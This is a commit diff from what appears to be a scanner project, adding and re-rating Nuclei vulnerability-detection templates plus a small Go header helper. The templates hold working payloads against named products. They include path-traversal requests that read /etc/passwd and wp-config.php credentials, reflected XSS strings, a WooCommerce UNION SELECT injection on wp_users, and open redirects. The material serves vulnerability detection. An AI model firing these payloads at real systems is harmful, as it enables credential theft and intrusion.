     19 + matchers-condition: and
     20 + matchers:
     21 + - type: word
     22 + part: body
     23 + words:
     24 + - '</iframe><svg/onload=alert("{{randstr}}")>'
     25 + 
     26 + - type: word
     27 + part: header
     28 + words:
     29 + - "text/html"
     30 + - "CONCRETE5"
     31 + condition: and
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/finereport-path-traversal.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: FineReport 8.0 - Local File Inclusion
    5 5   author: pikpikcu
    6  - severity: medium
     6 + severity: high
    7 7   description: FIneReport 8.0 is vulnerable to local file inclusion.
    8 8   reference:
    9 9   - http://foreversong.cn/archives/1378
    skipped 27 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/geovision-geowebserver-xss.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: GeoVision Geowebserver 5.3.3 - Cross-Site Scripting
    5 5   author: madrobot
    6  - severity: medium
     6 + severity: high
    7 7   description: GeoVision Geowebserver 5.3.3 and prior versions are vulnerable to several cross-site scripting / HTML injection / local file inclusion / XML injection / code execution vectors because the application fails to properly sanitize user requests.
    8 8   reference:
    9 9   - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
    skipped 32 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/gnuboard-sms-xss.yaml
     1 +id: gnuboard-sms-xss
     2 + 
     3 +info:
     4 + name: Gnuboard CMS - SMS Emoticon XSS
     5 + author: gy741
     6 + severity: medium
     7 + description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
     8 + reference:
     9 + - https://sir.kr/g5_pds/4788?page=5
     10 + - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
     11 + metadata:
     12 + verified: true
     13 + shodan-query: http.html:"Gnuboard"
     14 + tags: xss,gnuboard
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + part: body
     25 + words:
     26 + - '"0nuboard<svg onload=alert(document.domain)>"'
     27 + 
     28 + - type: word
     29 + part: header
     30 + words:
     31 + - "text/html"
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: HJTcloud - Local File Inclusion
    5 5   author: pikpikcu
    6  - severity: low
     6 + severity: high
    7 7   description: HJTcloud is vulnerable to local file inclusion.
    8 8   reference:
    9 9   - https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
    skipped 34 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/kingdee-eas-directory-traversal.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Kingdee EAS - Local File Inclusion
    5 5   author: ritikchaddha
    6  - severity: medium
     6 + severity: high
    7 7   description: Kingdee EAS OA server_file is vulnerable to local file inclusion and can allow attackers to obtain sensitive server information.
    8 8   reference:
    9 9   - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
    skipped 33 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/magicflow-lfi.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: MagicFlow - Local File Inclusion
    5 5   author: gy741
    6  - severity: critical
     6 + severity: high
    7 7   description: |
    8 8   MagicFlow is susceptible to local file inclusion vulnerabilities because it allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter.
    9 9   reference:
    skipped 27 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Nginx Server - Local File Inclusion
    5 5   author: dhiyaneshDk
    6  - severity: medium
     6 + severity: high
    7 7   description: Nginx server is vulnerable to local file inclusion.
    8 8   reference:
    9 9   - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
    skipped 31 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/pmb-directory-traversal.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: PMB 5.6 - Local File Inclusion
    5 5   author: geeknik
    6  - severity: medium
     6 + severity: high
    7 7   description: PMB 5.6 is vulnerable to local file inclusion because the PMB Gif Image is not sanitizing the content of the 'chemin' parameter.
    8 8   reference:
    9 9   - https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
    skipped 25 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/symantec-messaging-gateway.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Symantec Messaging Gateway <=10.6.1 - Local File Inclusion
    5 5   author: Random_Robbie
    6  - severity: medium
     6 + severity: high
    7 7   description: Symantec Messaging Gateway 10.6.1 and prior are vulnerable to local file inclusion.
    8 8   classification:
    9 9   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    skipped 21 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/other/unauth-spark-api.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Unauthenticated Spark REST API
    5 5   author: princechaddha
    6  - severity: medium
     6 + severity: critical
    7 7   description: The Spark product's REST API interface allows access to unauthenticated users.
    8 8   reference:
    9 9   - https://xz.aliyun.com/t/2490
    skipped 25 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Simple CRM 3.0 SQL Injection and Authentication Bypass
    5 5   author: geeknik
    6  - severity: high
     6 + severity: critical
    7 7   description: Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities.
    8 8   reference:
    9 9   - https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt
    skipped 30 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Ecology - Local File Inclusion
    5 5   author: princechaddha
    6  - severity: medium
     6 + severity: high
    7 7   description: Ecology is vulnerable to local file inclusion.
    8 8   metadata:
    9 9   fofa-query: app="泛微-协同办公OA"
    skipped 22 lines
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Ecology Springframework - Local File Inclusion
    5 5   author: princechaddha
    6  - severity: medium
     6 + severity: high
    7 7   description: Ecology Springframework is vulnerable to local file inclusion.
    8 8   classification:
    9 9   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    skipped 20 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/accessibility-helper-xss.yaml
     1 +id: accessibility-helper-xss
     2 + 
     3 +info:
     4 + name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
     5 + author: dhiyaneshDK
     6 + severity: medium
     7 + description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
     8 + reference:
     9 + - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
     10 + tags: xss,wordpress,wp-plugin,wp
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: word
     20 + part: body
     21 + words:
     22 + - "var wah_target_src = '';alert(document.domain);//';"
     23 + 
     24 + - type: word
     25 + part: header
     26 + words:
     27 + - text/html
     28 + 
     29 + - type: status
     30 + status:
     31 + - 200
     32 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml
     1 +id: admin-word-count-column-lfi
     2 + 
     3 +info:
     4 + name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
     5 + author: daffainfo,Splint3r7
     6 + severity: high
     7 + description: WordPress Admin Word Count Column 2.2 is vulnerable to local file inclusion.
     8 + reference:
     9 + - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
     10 + - https://wordpress.org/plugins/admin-word-count-column/
     11 + remediation: This plugin has been closed as of March 29, 2022 and is not available for download.
     12 + classification:
     13 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     14 + cvss-score: 7.5
     15 + cwe-id: CWE-22
     16 + tags: wordpress,wp-plugin,lfi,wp
     17 + 
     18 +requests:
     19 + - method: GET
     20 + path:
     21 + - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
     22 + 
     23 + matchers-condition: and
     24 + matchers:
     25 + - type: regex
     26 + regex:
     27 + - "root:[x*]:0:0"
     28 + 
     29 + - type: status
     30 + status:
     31 + - 200
     32 + 
     33 +# Enhanced by mp on 2022/08/01
     34 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
     1 +id: cab-fare-calculator-lfi
     2 + 
     3 +info:
     4 + name: WordPress Cab fare calculator 1.0.3 - Local File Inclusion
     5 + author: Hassan Khan Yusufzai - Splint3r7
     6 + severity: high
     7 + description: WordPress Cab fare calculator 1.0.3 is vulnerable to local file inclusion.
     8 + reference:
     9 + - https://www.exploit-db.com/exploits/50843
     10 + - https://wordpress.org/plugins/cab-fare-calculator
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     13 + cvss-score: 7.5
     14 + cwe-id: CWE-22
     15 + tags: wordpress,wp-plugin,lfi,wp
     16 + 
     17 +requests:
     18 + - method: GET
     19 + path:
     20 + - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
     21 + 
     22 + matchers-condition: and
     23 + matchers:
     24 + - type: regex
     25 + regex:
     26 + - "root:[x*]:0:0"
     27 + 
     28 + - type: status
     29 + status:
     30 + - 200
     31 + 
     32 +# Enhanced by mp on 2022/08/01
     33 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/candidate-application-lfi.yaml
     1 +id: candidate-application-lfi
     2 + 
     3 +info:
     4 + name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
     5 + author: dhiyaneshDK
     6 + severity: high
     7 + description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
     8 + reference:
     9 + - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
     10 + classification:
     11 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     12 + cvss-score: 8.6
     13 + cwe-id: CWE-22
     14 + tags: wordpress,wp-plugin,lfi,wp
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: regex
     24 + regex:
     25 + - "root:[x*]:0:0"
     26 + 
     27 + - type: status
     28 + status:
     29 + - 200
     30 + 
     31 +# Enhanced by mp on 2022/04/21
     32 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/db-backup-lfi.yaml
     1 +id: db-backup-lfi
     2 + 
     3 +info:
     4 + name: WordPress DB Backup <=4.5 - Local File Inclusion
     5 + author: dhiyaneshDK
     6 + severity: high
     7 + description: WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
     8 + reference:
     9 + - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
     10 + - https://www.exploit-db.com/exploits/35378
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     13 + cvss-score: 7.5
     14 + cwe-id: CWE-22
     15 + tags: wordpress,wp-plugin,lfi,wp
     16 + 
     17 +requests:
     18 + - method: GET
     19 + path:
     20 + - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
     21 + 
     22 + matchers-condition: and
     23 + matchers:
     24 + - type: word
     25 + part: body
     26 + words:
     27 + - "DB_NAME"
     28 + - "DB_PASSWORD"
     29 + condition: and
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 
     35 +# Enhanced by mp on 2022/08/05
     36 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/feedwordpress-xss.yaml
     1 +id: feedwordpress-xss
     2 + 
     3 +info:
     4 + name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
     5 + author: dhiyaneshDk
     6 + severity: medium
     7 + description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
     8 + reference:
     9 + - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
     10 + tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
     11 + 
     12 +requests:
     13 + - raw:
     14 + - |
     15 + POST /wp-login.php HTTP/1.1
     16 + Host: {{Hostname}}
     17 + Origin: {{RootURL}}
     18 + Content-Type: application/x-www-form-urlencoded
     19 + Cookie: wordpress_test_cookie=WP%20Cookie%20check
     20 + 
     21 + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
     22 + - |
     23 + GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
     24 + Host: {{Hostname}}
     25 + 
     26 + cookie-reuse: true
     27 + matchers-condition: and
     28 + matchers:
     29 + - type: word
     30 + part: body
     31 + words:
     32 + - '"><img src=2 onerror=alert(document.domain)>" method="post">'
     33 + 
     34 + - type: word
     35 + part: header
     36 + words:
     37 + - text/html
     38 + 
     39 + - type: status
     40 + status:
     41 + - 200
     42 + 
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/my-chatbot-xss.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: WordPress My Chatbot <= 1.1 - Reflected Cross-Site Scripting
    5 5   author: dhiyaneshDk
    6  - severity: medium
     6 + severity: high
    7 7   description: WordPress My Chatbot <= 1.1 is susceptible to cross-site scripting. The plugin does not sanitize or escape its tab parameter in the Settings page before outputting it back in an attribute.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/c0b6f63b-95d1-4782-9554-975d6d7bbd3d
    skipped 39 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
     1 +id: newsletter-manager-open-redirect
     2 + 
     3 +info:
     4 + name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
     5 + author: akincibor
     6 + severity: low
     7 + description: |
     8 + The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
     9 + reference:
     10 + - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
     11 + metadata:
     12 + verified: true
     13 + tags: wp-plugin,redirect,wordpress,wp,unauth
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
     19 + 
     20 + matchers:
     21 + - type: regex
     22 + part: header
     23 + regex:
     24 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
     25 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/ninjaform-open-redirect.yaml
     1 +id: ninjaform-open-redirect
     2 + 
     3 +info:
     4 + name: Ninja Forms < 3.4.34 - Administrator Open Redirect
     5 + author: dhiyaneshDk,daffainfo
     6 + severity: low
     7 + description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
     8 + reference:
     9 + - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
     10 + tags: wordpress,redirect,wp-plugin,ninjaform,authenticated,wp
     11 + 
     12 +requests:
     13 + - raw:
     14 + - |
     15 + POST /wp-login.php HTTP/1.1
     16 + Host: {{Hostname}}
     17 + Origin: {{RootURL}}
     18 + Content-Type: application/x-www-form-urlencoded
     19 + Cookie: wordpress_test_cookie=WP%20Cookie%20check
     20 + 
     21 + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
     22 + 
     23 + - |
     24 + GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1
     25 + Host: {{Hostname}}
     26 + 
     27 + req-condition: true
     28 + cookie-reuse: true
     29 + matchers:
     30 + - type: dsl
     31 + dsl:
     32 + - 'status_code_1 == 302'
     33 + - 'status_code_2 == 302'
     34 + - "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
     35 + condition: and
     36 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
     1 +id: simple-image-manipulator-lfi
     2 + 
     3 +info:
     4 + name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion
     5 + author: dhiyaneshDK
     6 + severity: high
     7 + description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
     8 + reference:
     9 + - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
     10 + classification:
     11 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     12 + cvss-score: 7.5
     13 + cwe-id: CWE-22
     14 + tags: wordpress,wp-plugin,lfi,wp
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: regex
     24 + regex:
     25 + - "root:[x*]:0:0"
     26 + 
     27 + - type: status
     28 + status:
     29 + - 200
     30 + 
     31 +# Enhanced by mp on 2022/07/29
     32 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/sniplets-lfi.yaml
     1 +id: sniplets-lfi
     2 + 
     3 +info:
     4 + name: WordPress Sniplets 1.1.2 - Local File Inclusion
     5 + author: dhiyaneshDK
     6 + severity: high
     7 + description: WordPress Sniplets 1.1.2 is vulnerable to local file inclusion.
     8 + reference:
     9 + - https://www.exploit-db.com/exploits/5194
     10 + classification:
     11 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     12 + cvss-score: 7.5
     13 + cwe-id: CWE-22
     14 + tags: wordpress,wp-plugin,lfi,wp
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + part: body
     25 + words:
     26 + - "DB_NAME"
     27 + - "DB_PASSWORD"
     28 + condition: and
     29 + 
     30 + - type: status
     31 + status:
     32 + - 200
     33 + 
     34 +# Enhanced by mp on 2022/07/29
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/sniplets-xss.yaml
     1 +id: sniplets-xss
     2 + 
     3 +info:
     4 + name: Wordpress Plugin Sniplets - Cross-Site Scripting
     5 + author: dhiyaneshDK
     6 + severity: medium
     7 + description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
     8 + reference:
     9 + - https://www.exploit-db.com/exploits/5194
     10 + tags: xss,wordpress,wp-plugin,wp
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: word
     20 + part: body
     21 + words:
     22 + - "</script><script>alert(document.domain)</script>"
     23 + 
     24 + - type: word
     25 + part: header
     26 + words:
     27 + - text/html
     28 + 
     29 + - type: status
     30 + status:
     31 + - 200
     32 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
     1 +id: video-synchro-pdf-lfi
     2 + 
     3 +info:
     4 + name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
     5 + author: Hassan Khan Yusufzai - Splint3r7
     6 + severity: high
     7 + description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
     8 + reference:
     9 + - https://www.exploit-db.com/exploits/50844
     10 + - https://wordpress.org/plugins/video-synchro-pdf/
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     13 + cvss-score: 7.5
     14 + cwe-id: CWE-22
     15 + tags: wordpress,wp-plugin,lfi,wp
     16 + 
     17 +requests:
     18 + - method: GET
     19 + path:
     20 + - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'
     21 + 
     22 + matchers-condition: and
     23 + matchers:
     24 + - type: regex
     25 + regex:
     26 + - "root:[x*]:0:0"
     27 + 
     28 + - type: status
     29 + status:
     30 + - 200
     31 + 
     32 +# Enhanced by mp on 2022/07/29
     33 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
     1 +id: wordpress-woocommerce-sqli
     2 + 
     3 +info:
     4 + name: Woocommerce Unauthenticated SQL Injection
     5 + author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
     6 + severity: critical
     7 + description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability.
     8 + reference:
     9 + - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
     10 + - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
     11 + - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
     12 + classification:
     13 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     14 + cvss-score: 10.0
     15 + cwe-id: CWE-89
     16 + tags: wordpress,woocommerce,sqli,wp-plugin,injection
     17 + 
     18 +requests:
     19 + - method: GET
     20 + path:
     21 + - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
     22 + - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
     23 + 
     24 + matchers-condition: and
     25 + matchers:
     26 + - type: word
     27 + words:
     28 + - 'sqli-test'
     29 + - 'attribute_counts'
     30 + - 'price_range'
     31 + - 'term'
     32 + condition: and
     33 + 
     34 + - type: word
     35 + words:
     36 + - 'application/json'
     37 + part: header
     38 + 
     39 + - type: status
     40 + status:
     41 + - 200
     42 + 
     43 +# Enhanced by mp on 2022/03/21
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wp-church-admin-xss.yaml
     1 +id: wp-church-admin-xss
     2 + 
     3 +info:
     4 + name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
     5 + author: daffainfo
     6 + severity: medium
     7 + reference:
     8 + - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html
     9 + tags: wordpress,xss,wp-plugin
     10 + 
     11 +requests:
     12 + - method: GET
     13 + path:
     14 + - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
     15 + 
     16 + matchers-condition: and
     17 + matchers:
     18 + - type: word
     19 + words:
     20 + - "</script><script>alert(document.domain)</script>"
     21 + part: body
     22 + 
     23 + - type: word
     24 + part: header
     25 + words:
     26 + - text/html
     27 + 
     28 + - type: status
     29 + status:
     30 + - 200
     31 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wp-revslider-file-download.yaml
     1 +id: wp-revslider-file-download
     2 + 
     3 +info:
     4 + name: Wordpress Revslider - Local File Inclusion
     5 + author: pussycat0x
     6 + severity: high
     7 + description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
     8 + reference:
     9 + - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
     10 + - https://cxsecurity.com/issue/WLB-2021090129
     11 + classification:
     12 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     13 + cvss-score: 7.5
     14 + cwe-id: CWE-22
     15 + metadata:
     16 + google-dork: inurl:/wp-content/plugins/revslider
     17 + tags: wordpress,wp-plugin,lfi,revslider
     18 + 
     19 +requests:
     20 + - method: GET
     21 + path:
     22 + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
     23 + - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
     24 + 
     25 + matchers-condition: and
     26 + matchers:
     27 + - type: word
     28 + part: body
     29 + words:
     30 + - "'DB_NAME'"
     31 + - "'DB_PASSWORD'"
     32 + - "'DB_USER'"
     33 + condition: and
     34 + 
     35 + - type: status
     36 + status:
     37 + - 200
     38 + 
     39 +# Enhanced by mp on 2022/07/29
     40 + 
  • ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wp-socialfit-xss.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: WordPress SocialFit - Cross-Site Scripting
    5 5   author: daffainfo
    6  - severity: medium
     6 + severity: high
    7 7   description: |
    8 8   WordPress SocialFit is vulnerable to a cross-site scripting vulnerability via the 'msg' parameter because it fails to properly sanitize user-supplied input.
    9 9   reference:
    skipped 27 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/vulnerabilities/wordpress/wp-whmcs-xss.yaml
     1 +id: wp-whmcs-xss
     2 + 
     3 +info:
     4 + name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
     5 + author: dhiyaneshDk
     6 + severity: medium
     7 + description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
     8 + reference:
     9 + - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
     10 + tags: wordpress,wp-plugin,authenticated,whmcs,xss
     11 + 
     12 +requests:
     13 + - raw:
     14 + - |
     15 + POST /wp-login.php HTTP/1.1
     16 + Host: {{Hostname}}
     17 + Origin: {{RootURL}}
     18 + Content-Type: application/x-www-form-urlencoded
     19 + Cookie: wordpress_test_cookie=WP%20Cookie%20check
     20 + 
     21 + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
     22 + - |
     23 + GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
     24 + Host: {{Hostname}}
     25 + 
     26 + cookie-reuse: true
     27 + matchers-condition: and
     28 + matchers:
     29 + - type: word
     30 + part: body
     31 + words:
     32 + - "<strong><img src onerror=alert(document.domain)></strong>"
     33 + condition: and
     34 + 
     35 + - type: word
     36 + part: header
     37 + words:
     38 + - text/html
     39 + 
     40 + - type: status
     41 + status:
     42 + - 200
     43 + 
  • ■ ■ ■ ■ ■
    pkg/fingerprint/fingerScan.go
    skipped 34 lines
    35 35   return dataString
    36 36  }
    37 37   
     38 +func headerToString(param map[string][]string) string {
     39 + var a []string
     40 + for k, v := range param {
     41 + a = append(a, k+": "+strings.Join(v, ";"))
     42 + }
     43 + return strings.Join(a, "\n")
     44 +}
